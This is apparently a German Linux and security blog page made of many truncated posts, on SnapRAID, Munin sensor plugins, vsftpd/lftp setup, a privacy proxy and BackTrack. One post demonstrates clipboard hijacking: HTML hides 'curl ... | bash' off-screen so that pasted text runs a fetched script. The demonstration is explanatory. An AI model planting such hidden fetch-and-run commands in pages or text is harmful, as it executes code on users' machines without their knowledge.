Wer regelmäßig nach Schwachstellen recherchieren muss, braucht eine schnelle, umfassende und relevante Suchmaschine um schnell im Rahmen eines Penetrationstests bekannte Schwachstellen finden zu können. Bisher gab es ein großes Angebot an mehr oder weniger vernetzten Datenbanken wie die OSVDB oder die NVD-Datenbank des NIST. Darüber hinaus gibt es die Exploit-Database von Offensive Security, die sich durch direkt verlinkte Exploits zu den Schwachstellen abhebt.

Das Hasso-Plattner-Institut hat die Vulnerability Database VDB veröffentlicht, die viele Datenbanken zusammenfassen soll. Die Nutzung ist nach einer Registrierung ohne Realdaten kostenlos.

Wie hilfreich ist die Datenbank für Penetrationstester?

Die HPI-VDB hat nicht den Anspruch die Exploit-DB zu ersetzen, direkte Links zu den zugehörigen Exploits gibt es nicht. Da es sich um eine reine Schwachstellen-Datenbank handelt, muss sich die VDB aber auch nicht mit Exploit-Datenbanken messen. Bleibt die Suchfunktion, um im Rahmen der Informationsbeschaffung erkannte Programme und Versionsnummern mit Schwachstellen zu korrelieren.

Und genau dort bietet die VDB bereits einen sehr praktischen Vorteil. Eine funktionierende Freitext-Suche. Und schnell ist die Suche, was rein subjektiv betrachtet bei anderen Datenbanken zu Stoßzeiten nicht immer der Fall ist.

Darüber hinaus bietet die VDB Vor- und Nachbedingungen in einem XML-Format, die maschinell ausgewertet werden können. Zugang zu einer API ist auf Anfrage per E-Mail laut FAQ möglich. Folgend zwei Screenshots der Datenbank (der zweite ist gekürzt).

Habt ihr die VDB schon ausprobiert? Was haltet ihr von dem Projekt?

Verwandte Themen:

1. PostgreSQL für Metasploit in BackTrack 5 einrichten

#!/usr/bin/python
import chardet
import os

for n in os.listdir('.'):
    print '%s => %s (%s)' % (n, chardet.detect(n)['encoding'], chardet.detect(n)['confidence'])

Eine Ausgabe sieht wie folgt aus. Dabei gibt der Wert in Klammern die Wahrscheinlichkeit des angegebenen Zeichensatzes an.

secops_wascii_asd.odt => ascii (1.0)
client_übergabe.odt => EUC-JP (0.99)
pg_seminar1_präsentation.odp => EUC-KR (0.99)

Um alle Dateinamen in einem Verzeichnis einheitlich in einen Zeichensatz zu konvertieren, bietet sich das Programm convmv an, das wie folgt installiert werden kann.

apt-get install convmv

Im ersten Schritt wird convmv im Simulationsmodus aufgerufen, um die neuen Dateinamen prüfen zu können. Sind die neuen Dateinamen in Ordnung, können sie übernommen werden.

convmv -f iso-8859-2 -t utf8 ./*.txt
convmv -f iso-8859-2 -t utf8 ./*.txt --notest

Nach Abschluss der Konvertierung bleibt die Umstellung des voreingestellten Zeichensatzes des Systems.

dpkg-reconfigure locales

Dort wird de_DE@UTF8 ausgewählt.

No related posts.

Der Autor charakterisiert es im Vergleich zu herkömmlichen RAID-Produkten dadurch, dass die Paritätsdaten nicht in Echtzeit aktualisiert werden. Dadurch ergeben sich besonders für Anwendungen die nicht unter Dauerlast stehen interessante Möglichkeiten.

Praktisch funktioniert SnapRAID wie ein RAID4 mit separater Paritätsdaten-Festplatte, deren Inhalt nur bei Bedarf aktualisiert wird. Dadurch ist SnapRAID zwischen herkömmlichen RAID-Systemen und Backups einzuordnen. Angesprochen werden SnapRAID-Volumes ähnliche wie JBOD-Konfigurationen, also jede Festplatte einzeln.

Im Unterschied zur kommerziellen Lösung FlexRAID bietet SnapRAID nur die Snapshot-Funktion. Es gibt seit Version 3.0 zwar eine Pooling-Funktion, um die einzelnen Festplatten als ein großes Volume ins Betriebssystem abzubilden, diese ist aber noch nicht ausgereift und verwendet symbolische Links. Auch Monitoring-Funktionen oder die Aufgabenplanung für die Erstellung von Snapshots oder eine grafische Oberfläche sucht man vergeblich. Diese Einfachheit ist sehr lobenswert und entspricht der UNIX-Philosophie.

Eine Konsequenz daraus ist, dass zwar keine Steigerung des Maximaldurchsatzes durch Lesen von mehreren Festplatten erreicht wird, dafür aber auch immer nur die Festplatten laufen müssen, von denen aktiv gelesen wird. In einem Fileserver mit mehreren dutzend Festplatten spart diese Eigenschaft eine Menge Strom.

In der Praxis werden alle Festplatten einzeln mit einem Dateisystem formatiert und eingebunden.

Diese Eigenschaft hilft auch beim Ausfall mehrerer Festplatten. SnapRAID kann sowohl mit einer als auch mit zwei Fesplatten für Paritätsdaten betrieben werden. Je nachdem dürfen dann eine oder zwei Festplatten ausfallen. Ein Vorteil der einzelnen Formatierung gegenüber herkömmlichen RAID-Verbünden ist, dass auch bei Ausfall mehrerer Festplatten die Daten von den intakten Festplatten weiterhin gelesen werden können.

Ein ausführlicher Vergleich verschiedener RAID-Systeme sowie den beliebten Volume-Managern ZFS und BTRFS bietet der Autor hier an. Fragen zu speziellen Funktionen von SnapRAID werden hier beantwortet.

Installation

Leider stehen noch keine Debian-Pakete für SnapRAID zur Verfügung, sodass das Programm per Hand kompiliert werden muss. Das geht mit dem Werkzeug checkinstall, dass ein rudimentäres Debian-Paket erstellt, leicht von der Hand.

apt-get install build-essential checkinstall
cd /usr/local/src/
wget -O snapraid.tar.gz http://sourceforge.net/projects/snapraid/files/snapraid-3.0.tar.gz/download
tar xvzf snapraid.tar.gz
cd snapraid-3.0/
./configure && make && make check

Nach Ausführung der Tests sollte folgende Bestätigung für das erfolgreiche Durchlaufen erscheinen.

No error
echo Success!
Success!
make[1]: Leaving directory `/usr/local/src/snapraid-3.0'

Daraufhin kann SnapRAID und die SnapRAID-Konfiguration installiert werden.

checkinstall make install
cp snapraid.conf.example /etc/snapraid.conf

Konfiguration

Die Einrichtung eines SnapRAID-Volumes ist denkbar einfach über die Konfigurationsdatei /etc/snapraid.conf zu steuern. Hier ein Beispiel als Vorlage.

# Paritaetsdaten-Datei auf eigener Festplatte
parity /storage/b2c07a05-a3e7-44ca-bc7a-1d29a0a2258a_parity/parity

# Hash-Indizes-Datei auf jeder nicht-Paritaetsdaten Festplatten
content /storage/03e2a8fb-be5d-4791-a1d0-e42597771e57/.content
content /storage/3c2b7a4d-aad1-4731-afac-51c163349726/.content
content /storage/82191233-42e8-4cca-8f6d-ba9e0376e5e0/.content
content /storage/a3a5b302-9c69-465d-a910-839abd3fc553/.content

# Angabe der Namen und Pfade zu den Daten-Festplatten
disk 03e2a8fb-be5d-4791-a1d0-e42597771e57 /storage/03e2a8fb-be5d-4791-a1d0-e42597771e57/
disk 3c2b7a4d-aad1-4731-afac-51c163349726 /storage/3c2b7a4d-aad1-4731-afac-51c163349726/
disk 82191233-42e8-4cca-8f6d-ba9e0376e5e0 /storage/82191233-42e8-4cca-8f6d-ba9e0376e5e0/
disk a3a5b302-9c69-465d-a910-839abd3fc553 /storage/a3a5b302-9c69-465d-a910-839abd3fc553/

exclude *.bak
exclude *.unrecoverable
exclude /tmp/
exclude /lost+found/

block_size 256

Verwandte Themen:

1. Debian per USB-Stick installieren
2. John the Ripper Multicore unter Ubuntu/Debian
3. Debian Spezialkernel für Fileserver: raidcrypto

Die getesteten Browser waren:

• Firefox 20
• Firefox 23.0a1
• Opera 12.02
• Opera 12.15
• Chromium 25.0.1364.160

Jeweils mit xterm und dem XFCE Terminal in Version 0.4.8 unter verschiedenen Ubuntu-Versionen.

Entscheidend für die Effektivität des Tricks ist, dass die kopierten Befehle beim Einfügen unmittelbar ausgeführt werden. Dafür muss nur sichergestellt werden, dass ein Newline-Zeichen mit in der Zwischenablage landet. Ergänzt man den Tip von Heise durch ein solches Zeichen und fügt dem untergeschobenen Befehl ein clear an, wird der Tip direkt doppelt nützlich.

Beispiele

Hier zwei Varianten, die das gewünschte Ergebnis liefern.

<html>
<!-- notice the newline after the hidden command inserted using a html <br>  -->
<p><pre>echo<span style="position: absolute; left: -1000px; top: -1000px"> ""; curl -s http://localhost/runfunnycommands.txt | bash; clear; echo <br></span> Hallo Welt!<br></pre></p>
</html>

<html>
<!-- notice the newline after the hidden command inserted using a raw newline -->
<p><pre>echo<span style="position: absolute; left: -1000px; top: -1000px"> ""; curl -s http://localhost/runfunnycommands.txt | bash; clear; echo
</span> Hallo Welt!<br></pre></p>
</html>

Ergebnis

Bei Auswahl des scheinbar harmlosen Textes aus dem ersten Bild und Übertragung in einen Terminal-Emulator mittels mittlerer Maustaste oder STRG-V werden direkt Befehle ausgeführt.

Verwandte Themen:

1. TeVii S470 Probleme unter Linux

Seit einigen Wochen läuft aber ein Privatsphären-Proxy (ugs. “Elite Proxy”) statt des bisher betriebenen Proxys im Rechnerraum der IRB.

Elite Proxy
Ein Elite Proxy ist ein Proxy-Server, der sich nicht als Proxy zu erkennen gibt und für Webserver nur mit der eigenen IP-Adresse und nicht mit der IP-Adresse des Proxy-Nutzers in Erscheinung tritt.
(Quellen hier, hier und hier.)

Die Architektur unseres Proxys an der IRB geht aber einen Schritt weiter, als einfache Elite Proxys und gesteht den Nutzern weitere Anonymität zu. Dafür betreiben wir eine Proxykaskade aus Squid und Privoxy, die im Vergleich zu einem herkömmlichen Proxy-Server wie folgt aussieht.

Deutlich zu erkennen sind die Unterschiede im Speicher-Subsystem und dem vorgeschalteten Privoxy. Die speziellen technischen Unterschiede sind in meinem Linux Magazin Artikel (lokale Kopie, nur Fakultäts-Netzwerk) beschrieben.

Squid

Der Squid-Proxy verhält sich in Voreinstellung konform zum Pseudostandard und sendet bei jeder Anfrage einen X-Forwarded-For Header, der die IP-Adresse des anfragenden Clients enhtält. Hierdurch wird die Anonymität aufgelöst. Darum wird in unserer Proxykaskade dieser Header gelöscht, sowie weitere Header die Informationen über den anfragenden Nutzer oder die anfragende IP enthalten entweder gesperrt oder verfremdet. Squid bietet für den Zweck nur die Möglichkeit, einen Header zu sperren, oder weiterzuleiten.

Privoxy

Um Privatsphäre ohne Einbuße von Komfort bereitstellen zu können, ist Privoxy notwendig. Der Header HTTP_REFER sendet dem Webserver in einer Anfrage die vorher aufgerufene Webseite.

Wechselt der Nutzer aber von einem Webshop-System auf die Suchmaschine Google, ist die Suchmaschine dank HTTP_REFERER in der Lage, die vorher aufgerufene URL zu speichern.

Die Auswertung des Referers wird von einigen Webseiten benötigt, um korrekt zu funktionieren, darum ist eine Sperrung nicht möglich. Dazu gehören Onlinebanking- und Webshop-Systeme. Da der Referer zum Ausspähen des Nutzers mißbraucht werden kann, wenn die Domain gewechselt wird, sperrt Privoxy nur in diesem Fall den Referer und setzt ihn auf die Domain der aufgerufenen Webseite.

Speicher-Subsystem

Der Squid-Proxy speichert in Voreinstellung umfangreiche Logdaten zur Anfrage, wie zum Beispiel die komplette URL mit etwaigen GET-Parametern, sowie die anfragende IP-Adresse und den verwendeten Browser. Darüber hinaus wird über eine zweite Logdatei aufgezeichnet, welches Objekt im Cache von welcher IP-Adresse zuerst angefragt wurde. So ist mit der Voreinstellung eine lückenlose Überwachung aller Nutzer möglich. Auch dieses Verhalten ist für einen Privatsphären-Proxy nicht wünschenswert.

Darum sind Logfiles komplett deaktiviert. Es werden nur Key Performance Indicators in einer Datenstruktur im Arbeitsspeicher vorgehalten, die das verursachte Datenvolumen den IP-Adressen zuordnen.

Der Cache ist darüber hinaus mit einem Zufallschlüssel in AES verschlüsselt, der bei jedem Neustart neu erzeugt wird, um auch eine statistische Zuordnung von verursachtem Datenvolumen zu Objekten (und damit aufgerufenen Webseiten) im Cache zu verhindern.

Um trotzdem im Falle eines Missbrauchs handlungsfähig zu bleiben, kann der komplette Datenverkehr eines Nutzers bei begründetem Verdacht protokolliert werden, ohne andere Nutzer zu beeinträchtigen.

Verwandte Themen:

1. Linux-Magazin Artikel zu Elite Proxies und Perfect Privacy
2. Transmission Webinterface mit Apache auf SSL umstellen
3. Postfix Header anonymisieren

Durch Wahl des Gerätetype (in diesem Fall sat) lässt sich das Gerät ansprechen und wie gewohnt auslesen.

smartctl --all -d sat /dev/sda

No related posts.

Diese gepatchtet Version ist sehr empfehlenswert. Zusammengefasst kann damit in beide Richtungen der Maximaldurchsatz gemessen werden, ohne im Router zuhause Ports öffnen zu müssen. Das neue --reverse Flag macht es möglich.

Verwandte Themen:

1. 802.11 und Probleme durch Kanalüberlappung in Ballungsräumen

• Auslastung jedes DVB-C Kanals im Downstream
• Gesamtauslastung
• Jeweils (inoffiziell erfragte) Grenzwerte für Warnungen und kritische Zustände
  (Sodass ihr direkt ablesen könnt, ob es sich lohnt eine Störung zu melden)

DOCSIS Allgemein

Um die Graphen lesen zu können ist Hintergrundwissen zu DVB-C und DOCSIS notwendig. DOCSIS bietet ein geteiltes Medium, dass auf Kanälen basiert, die unter den Kunden aufgeteilt werden. Es stehen also für mehrere hundert Benutzer insgesamt 380 Mbit/sec im Downstream zur Verfügung. Bei Unitymedia werden die folgenden acht DVB-C Kanäle benutzt.

• 542MHz
• 578MHz
• 586MHz
• 594MHz
• 602MHz
• 618MHz
• 626MHz
• 634MHz

Jeder dieser Kanäle hat bei EuroDOCSIS 3.0 eine Brutto-Datenrate von 55MBit/sec (siehe Folie 4)  von der minus Tara ungefähr 47,5MBit/sec Netto-Datenrate für die TCP/IP-Nutzlast übrig bleibt. Das bedeutet auf allen acht Kanälen gemeinsam stehen etwa 380Mbit/sec zur Verfügung, was auch den Ergebnissen von Unitymedia in Feldtests entspricht. Um die Auslastung dieser acht Kanäle zu messen bedarf es nur eines verhältnismäßig preisgünstigen DVB-C USB-Sticks.

Hardware

Nach Tests zur Messung der Segmentauslastung durch Florian Strankowski eignet sich der MediaTV Digital Home DVB-CT Stick der Firma Sundtek besonders gut. Treiber für Linux die auf Anhieb unter Debian funktionieren lassen sich aus dem Support-Forum des Herstellers beziehen. Darüber hinaus ist für mein Plugin nur das Programm dvbsnoop erforderlich.

apt-get install dvbsnoop

Download

Das Plugin kann via GitHub aus dem Repository munin-sundtek_docsis bezogen werden.

Verwandte Themen:

1. Fritz!Box Cable mit Munin überwachen ohne alternative Firmware
2. SNMP mit Munin
3. Linux USB-Thermometer TEMPer mit Munin für unter 20 Euro

IPv4-Adresse: 46.182.18.228

IPv6-Adresse: 2a02:2970:1002::ffa6

Weitere Informationen dazu gibt es hier und die Statistiken gibt es hier. Über Fragen oder Anregungen würde ich mich freuen.

Verwandte Themen:

1. Alternativer DNS Server
2. Ein Vierteljahr mit NbIServer für OpenNIC
3. DNS-Query Limits mit iptables und Burstrate

• Architektur ARMv6l
• Prozessor PLX 7820 700MHz Dual-core
• RAM 128MB
• NAND 128MB
• 4 USB / 1 SATA
• Gigabit Ethernet

Laut einigen Threads ist allerdings hier in Bezug auf Debian Vorsicht geboten. Das Gerät benötigt scheinbar einen speziellen Kernel, den zur Zeit nur Archlinux bietet.

• Link zur Installation mit Archlinux
• Gegenüberstellung RaspberryPi Pogoplug
• Probleme mit Debian auf POGO-P24
• Informationen zur verbauten Hardware

Viel Glück beim Zuschlagen!

Verwandte Themen:

1. Linux USB-Thermometer TEMPer mit Munin für unter 20 Euro
2. DD-Wrt in Virtualbox verwenden
3. Linux Fileserver Optimierung

Wird der neue als gold TEMPer betitelte Sensor angeschlossen ergibt sich folgendes Bild:

[1816401.763718] usb 2-1: Product: TEMPerV1.2
[1816401.763724] usb 2-1: Manufacturer: RDing
[1816401.782819] input: RDing TEMPerV1.2 as /devices/pci0000:00/0000:00:10.0/usb2/2-1/2-1:1.0/input/input44
[1816401.783419] generic-usb 0003:0C45:7401.004F: input,hidraw0: USB HID v1.10 Keyboard [RDing TEMPerV1.2] on usb-0000:00:10.0-1/input0
[1816401.798144] generic-usb 0003:0C45:7401.0050: hiddev0,hidraw1: USB HID v1.10 Device [RDing TEMPerV1.2] on usb-0000:00:10.0-1/input1
[1817325.787837] udev[26706]: starting version 164

Nach längerer Suche im Internet wird klar, dass für die neue Version eine spanische Firma (ISP-SL) verantwortlich zeichnet, die auch hier einen entsprechenden Treiber zur Verfügung stellt. Damit geht die Installation der Software dann ganz schnell wie folgt.

apt-get install build-essentials libusb-dev
wget "http://www.isp-sl.com/pcsensor-1.0.0.tgz"
tar xvzf pcsensor-1.0.0.tgz
cd pcsensor-1.0.0
make clean
make pcsensor
make rules-install
cp pcsensor /usr/local/bin/

Um die udev Regeln zu aktivieren muss jetzt der Computer neugestartet werden, oder der entsprechende Dienst mit dem Befehl /etc/init.d/udev reload neugestartet werden. Alternativ tut es auch ein abziehen und wiedereinstecken des TEMPer Moduls.

Hat alles geklappt, liefert die Eingabe des Befehl pcsensor jetzt die gewünschten Daten.

# pcsensor 
2012/12/08 19:53:33 Temperature 71.83F 22.12C

Um auch dauerhaft einen Überblick über die gemessene Temperatur zu behalten, eignet sich ein Munin-Plugin (Abbildung folgt).

RDing TEMPer 1.2

Das ist schnell geschrieben und könnte wie folgt aussehen.

#!/bin/sh
# Where is pcsensor located?
PCSENSOR="/usr/local/bin/pcsensor"

if [ ! -e ${PCSENSOR} ]; then
	echo "Cannot find pcsensor executable" >&2
	exit -1
fi

case $1 in
   config)
	echo "
graph_title TEMPer USB Thermometer
graph_vlabel Celsius
graph_info This graph shows the temperatur reported by the attached TEMPer USB Thermometer.
graph_category Sensors
temp.label temp
temp.draw AREA
temp.colour FFD700
# < water freezes, > high fever
temp.warning 4:40
# sensor max
temp.critical -40:120
	"
        exit 0;;
esac

echo -n "temp.value "
${PCSENSOR} -cm | head -n1

Zusammengefasst lässt sich sagen, dass der TEMPer nicht leich in Betrieb zu nehmen war. Nicht, weil die Software nicht zur Verfügung stand, sondern weil der Sensor schlicht ohne Handbuch oder Treiber oder Informationen über Bezugsquellen für Treiber geliefert wurde. Das ist schade, aber bei einem Preis von unter 20 Euro zu verschmerzen.

Verwandte Themen:

1. TeVii S470 Probleme unter Linux
2. SNMP mit Munin
3. Fritz!Box Cable mit Munin überwachen ohne alternative Firmware

Nicht oft gibt es bei Internet Service Providern etwas geschenkt. Zumindest war das meine Vermutung, bevor ich für ein nicht-kommerzielles Projekt auf die Suche nach einem langfristigen Sponsor ging.

Es ging darum, für das Projekt OpenNIC Serverkontingente zu finden, die einzig für den Betrieb von rekursiven Nameservern genutzt werden sollten. So ein Nameserver ist eine Software, die Namen wie zum Beispiel falkhusemann.de in IP-Adressen wie 94.23.233.6 auflöst. Ohne DNS und die dafür notwendigen Nameserver wäre eine Benutzung des Internets nur über IP-Adressen möglich.

Zusätzlich erschwerend kam hinzu, dass das OpenNIC Projekt kein Verein ist, sondern aus einzelnen Personen besteht, die freiwillig Nameserver betreiben. Freiwilligenarbeit also.

Als einer der Provider, die Interesse zeigten, das Projekt zu unterstützen, meldete sich der Bethenhausener Anbieter NbIServ. Nach kurzer Verifizierung meiner persönlichen Daten wurde ein vServer vom Typ VS-2012-XS zur Verfügung gestellt.

“…Wir freuen uns ein Projekt wie die openNIC aktiv unterstützen zu dürfen…” , so Martin Prager Geschäftsführer von NbIServ

Die eingesetze Virtualisierungstechnik ist OpenVZ und das System bietet folgende Eckdaten:

• 256 MiB Arbeitsspeicher
• 20 GiB Festspeicher
• Flatrate bei fairer Benutzung

Verwalten lässt sich der virtuelle Server über die Software oVZManager, wie das folgende Bildschirmfoto zeigt.

Folgend meine Erfahrungen mit dem Anbieter und der gebotenen technischen Dienstleitung:

Verfügbarkeit

Für NbIServ spricht eindeutig, dass der virtuelle Server seit einem Vierteljahr ohne Ausfall läuft. In dieser Zeit konnte meine Netzwerküberwachung zwar mehrere Ausfälle des Nameservers, nicht aber des virtuellen Servers oder dessen Anbindung feststellen.

Kundendienst

Der Kontakt mit dem Eigentümer Herrn Prager erfolgte direkt und sehr zügig. Dieser Punkt ist gerade bei Ausfällen eine willkommene Seltenheit und als Zusatzdienstleistung bei anderen Anbietern kaum bezahlbar.

Technische Leistung

Der zugesicherte Arbeitsspeicher, die Anbindung und der Festspeicher standen zur Verfügung. Hier findet offensichtlich keine oder nur eine begrenzte Überbuchung der Server statt. Der sequentielle Maximaldurchsatz des E/A-Subsystems lag bei durchschnittlich circa 200 MB/sec wie der folgende Benchmark belegt.

root@NbI-545:~# spew -g -i 3 --read-after-write 1g testfile
Total iterations:                                3
Total runtime:                            00:01:02
Total write transfer time (WTT):          00:00:22
Total write transfer rate (WTR):   140608.38 KiB/s
Total write IOPS:                  281216.77 IOPS
Total read transfer time (RTT):           00:00:12
Total read transfer rate (RTR):    251710.17 KiB/s
Total read IOPS:                   503420.35 IOPS

Und einige weitere Benchmarks:

• OpenSSL Benchmark
• Ausgabe /proc/cpuinfo
• Speedtest Anbindung

IPv6 ist ebenso verfügbar. Einzig bei Tests des Maximaldurchsatzes der Anbindung des vServers fielen Einschränkungen auf. Der steigt nur gelegentlich über 4 MB/sec und bewegt sich bei Quellen aus dem deutschen Forschungsnetz oder QSC ansonsten bei circa 2MB/sec. Das spielt zwar für den darauf laufenden OpenNIC Nameserver keine Rolle, kann aber bei Verwendung als Backupsystem wichtig sein.

Fazit

Zusammengefasst bietet NbIServ mit dem gestellten vServer ein Produkt, dass die Ansprüche an Verlässlichkeit und kontinuierliche Leistung von fortgeschrittenen Kunden befriedigt. Einziger Kritikpunkt ist der nicht mehr zeitgemäße Maximaldurchsatz der Anbindung.

Verwandte Themen:

1. DNS-Query Limits mit iptables und Burstrate
2. Alternativer DNS Server

Unter Debian GNU/Linux geht das besonders einfach, indem der Datei /etc/samba/smb.conf im Abschnitt [global] der folgende Eintrag hinzugefügt wird.

disable netbios = Yes

Diskutiert wird die Möglichkeit nmbd zu deaktivieren in einem Debian Bugreport.

Verwandte Themen:

1. Shell Schnipsel: sambaversion
2. Apache 2.2 Logfiles abschalten
3. Maximaldurchsatz der modifizierten Seagate Dockstar optimieren

Fritz!DOCSIS Munin Plugin (Repository)

Zum Verfahren gibt es nicht mehr zu sagen, als die Kommentare des Quelltexts zu zitieren:

// DISCLAIMER: Now comes the funny part!
// 1. AVM enclosed a LUA table in <code> tags. First we get the LUA table out!
// 2. Then we parse the LUA table to an array using a parser for World of Warcraft (it's everywhere, mh?)
// 3. Now we "decode" (read: de-fuckup) the LUA table to proper SNMP keys for DOWNSTREAM and UPSTREAM

Um es kurz zu machen, folgen die drei Graphentypen die das Plugin erzeugen kann.

Downstream

Für jeden Downstream Kanal den Powerlevel in dBmV und die Leitungsdämpfung in dB.

Downstream Fehler

Für jeden Downstream Kanal sowohl die korrigierbaren wie auch die unkorrigierbaren Fehler.

Upstream

Für jeden Upstream Kanal den Powerlevel in dBmV.

Die Graphen sehen nach einigen Tagen zum Beispiel wie folgt aus.

Das Plugin ist in einem GitHub Repository gespeichert und seit mehreren Wochen erfolgreich in Betrieb.

Habt ihr eigene Skripte für die Fritz!Box ohne SNMP geschrieben? Vielleicht sogar für Munin? Über einen Kommentar würde ich mich freuen! Sollte jemand von Unitymedia diesen Blogpost lesen: Bitte installiert doch einen SNMP Daemon.

Verwandte Themen:

1. SNMP mit Munin
2. TVHeadend mit Monit überwachen
3. 802.11 und Probleme durch Kanalüberlappung in Ballungsräumen

Im letzten Artikel zum File Transfer Protocol wurde die moderne Einrichtung eines FTP-Servers vorgestellt. Jetzt soll ein Verzeichnis des FTP-Servers mit einem lokalen Server synchronisiert werden.

Besonders der Maximaldurchsatz soll dabei errreicht werden. Dazu bieten viele Windows FTP-Clients zwei Modi an.

• Segmentiert
  bedeutet, dass eine Datei in logische Abschnitte geteilt und mit mehreren Verbindungen heruntergeladen und auf dem Zielcomputer zusammengesetzt wird.
• Threaded
  bedeutet mehrere Dateien gleichzeitig über mehrere Datenverbindungen herunterzuladen.

Sowohl Threaded wie auch Segmented Übertragungen sollen gegebenfalls vorhandene Durchsatzprobleme bei Verwendung einer einzigen Verbindung umgehen. Das geht doch auch mit Linux?

Im folgenden wird ein Skript vorgestellt, dass lftp so in einer screen Sitzung startet, dass die Vorteile der Segmented und Threaded Verfahren zusammen mit den Vorteilen einer Hintergrundsitzung bietet. Dabei kommt der FTP-Client lftp zum Einsatz, der sich zur Automatisierung besonders gut eignet, weil er umfangreiche Konfigurationsmöglichkeiten bietet.

lftp Konfigurieren

Zuerst muss die notwendige Software installiert werden.

apt-get install lftp screen

Bevor das Skript eingesetzt werden kann, muss lftp konfiguriert werden, indem im Verzeichnis ~/.lftp/ des ausführenden Benutzers eine Datei rc mit folgendem Inhalt angelegt wird.

# GENERAL
set color:use-color true

# FTP
set ftp:list-options -a
set ftp:passive-mode true
# Send multiple commands async.
set ftp:sync-mode false

# SEGMENTED
set pget:default-n 4
set pget:save-status 30

# DIRECTORES
set mirror:order "*.txt [rR]eadme"
set mirror:use-pget-n 4
set mirror:parallel-transfer-count 2
set mirror:parallel-directories true

# Always SSL!
set ftp:ssl-force true

# Foreground cmds first!
set net:connection-takeover true
# Disconnect after 30mins idle!
set net:idle 1800
# Max 32 connections to everywhere!
set net:connection-limit 32

Synchronisations-Skript

Das folgende Skript synchronisiert das Verzeichnis REMOTE_DIR mit dem Verzeichnis LOCAL_DIR. Dafür wird eine screen Sitzung mit dem Namen lftp-sync im Hintergrund gestartet, in der lftp gestartet wird. An diese Sitzung sendet das Skript den mirror Befehl und beendet sich nach dem sichergestellt ist, dass eine solche Sitzung auch existiert.

#!/bin/bash

# Information about the source
HOST="123.123.123.123"
PORT=21
USER="sync"
PASS="foobar"

# download target
LOCAL_DIR="/mnt/123.123.123.123/forschungsdaten"

# source dir
REMOTE_DIR="/forschungsdaten"

function lftpcmd()
{
screen -S lftp-sync -p 0 -X stuff "$1"`echo -ne '\015'` 2>&1 >> /dev/null
}
function lftpkill()
{
screen -ls lftp-sync | grep lftp-sync | cut -d "." -f 1 | sed -e 's/^[ \t]*//' | xargs kill -9 $1
screen -wipe
}

# Start background lftp session if none or more than 1 is found running
if ! [ "`screen -ls lftp-sync | lftp-sync | wc -l`" -eq 1 ]; then
if [ "`screen -ls lftp-sync | grep lftp-sync | wc -l`" -gt 1 ]; then
lftpkill
fi
# Start a new session
screen -dmS lftp-sync lftp
# Set up the connection using commands sent to screen
lftpcmd "open ftp://$USER:$PASS@$HOST:$PORT/"
fi

# Add a new sync to the queue
lftpcmd "queue mirror -x ^\Incoming/$ -p \"${REMOTE_DIR}\" \"${LOCAL_DIR}\""

Verwandte Themen:

1. rsync,ssh,tar und socat – Große Datenbestände kopieren
2. Laufenden Prozess in screen Sitzung verschieben
3. vsftpd mit virtuellen Benutzern, FXP und Verschlüsselung in 5 Minuten

Zuerst werden alle nötigen Programme installiert.

apt-get install vsftpd apache2-utils ssl-cert libpam-pwdfile

Es muss die Datei /etc/vsftpd.conf wie folgt angepasst werden.

listen=YES
local_enable=YES
write_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
chroot_local_user=YES
secure_chroot_dir=/var/run/vsftpd/empty
pam_service_name=vsftpd
rsa_cert_file=/etc/ssl/private/vsftpd.pem

# Virtuelle Benutzer verwenden
nopriv_user=shared
virtual_use_local_privs=YES
guest_enable=YES
user_sub_token=$USER
local_root=/home/shared/pub
chroot_local_user=YES
hide_ids=YES

# FXP erlauben
pasv_promiscuous=YES
pasv_enable=YES
pasv_min_port=49152
pasv_max_port=50000
port_promiscuous=YES

# SSL fuer Daten- und Kontrollverbindung erzwingen
ssl_enable=YES
force_local_data_ssl=YES
force_local_logins_ssl=YES

# Kleiner Scherz ;) (http://www.exploit-db.com/exploits/15449/)
ftpd_banner=ProFTPD 1.3.3a

Diese Konfigurationsdatei erlaubt es allen angelegten Benutzern das Verzeichnis /home/shared zu sehen. Soll jeder Benutzer nur ein eigenes Verzeichnis sehen können, muss die Option local_root auf den Wert /home/shared/pub/$USERgesetzt werden.

Dann wird das selbst-signierte SSL-Zertifikat für vsftpd angelegt.

make-ssl-cert /usr/share/ssl-cert/ssleay.cnf /etc/ssl/private/vsftpd.pem

Nun muss die PAM-Authentifizierung von vsftpd angepasst werden, sodass vsftpd die Daten aus einer Datei liest. Dafür wird der Inhalt der Datei /etc/pam.d/vsftpd gelöscht und durch folgenden Inhalt ersetzt.

auth required pam_pwdfile.so pwdfile /etc/ftpd.passwd
account required pam_permit.so

Die genannte Datei /etc/ftpd.passwd kann durch das Werkzeug htpasswd mit Benutzern und Passwörtern befüllt werden.

# Für den ersten Benutzer
htpasswd -c /etc/ftpd.passwd user1
# Für alle folgenden Benutzer
htpasswd /etc/ftpd.passwd userN

Nach einem Neustart von vsftpd mittels dem Befehl /etc/init.d/vsftpd restart ist der neue FTP-Server einsatzbereit.

Verwandte Themen:

1. OVH Server from Scratch mit Debian und dm-crypt Verschlüsselung
2. rsync,ssh,tar und socat – Große Datenbestände kopieren

Vor ein paar Minuten wurde BackTrack, die Distribution für Penetrationstester in einer neuen Version freigegeben. Die aktuelle Version 5 Release 2 wird abgelöst durch Release 3. Was nach einer kleinen Aktualisierung klingt, bringt eine Menge neuer Werkzeuge mit. Wie im Bugtracker des Projekts ersichtlich, gehört dazu nicht nur eine neue Version von Metasploit, sondern auch eine komplett neue Werkzeuggattung.

Download Links gibt es hier (bisher nur Torrent).

Laut BackTrack Entwicklungsteam gibt über 60 neue Werkzeuge und eine neue Kategorie “Physical Exploitation” für physikalische Angriffe. In dieser Kategorie sind die folgenden Werkzeuge enthalten.

• arduino

ist eine Prototyping Plattform für eingebettete Systeme.

• kautilya

von Nikhil Mittal, ist in der Lage für Teensy+ Payloads zu erzeugen. Ein Linux emuliert ein HID Gerät, dass als Tastatur oder Maus Eingaben simuliert. kautilya bietet Payloads für diese Funktion, die von hosts Datei bearbeiten bis zu Add a User and enable RDP reichen. Genial!

• u3-pwn

von nullsecurity, ein Werkzeug um beliebige Programme in den sicheren Bereich von SanDisk USB-Sticks einzufügen.

• videojak

von Viper Lab, ein Werkzeug um Videotelefonie über IP auf Sicherheit zu prüfen, mit den Hauptfunktionen Session Replay, beliebige AVI-Datei abspielen, oder Denial of Service.

Am Aussehen hat sich nicht viel geändert, im folgenden die ersten Eindrücke von BackTrack 5R3.

Verwandte Themen:

1. BackTrack Tools – Teil 1 PBNJ
2. PostgreSQL für Metasploit in BackTrack 5 einrichten
3. Erfahrungsbericht: BackTrack Linux Aufkleber fürs Rack

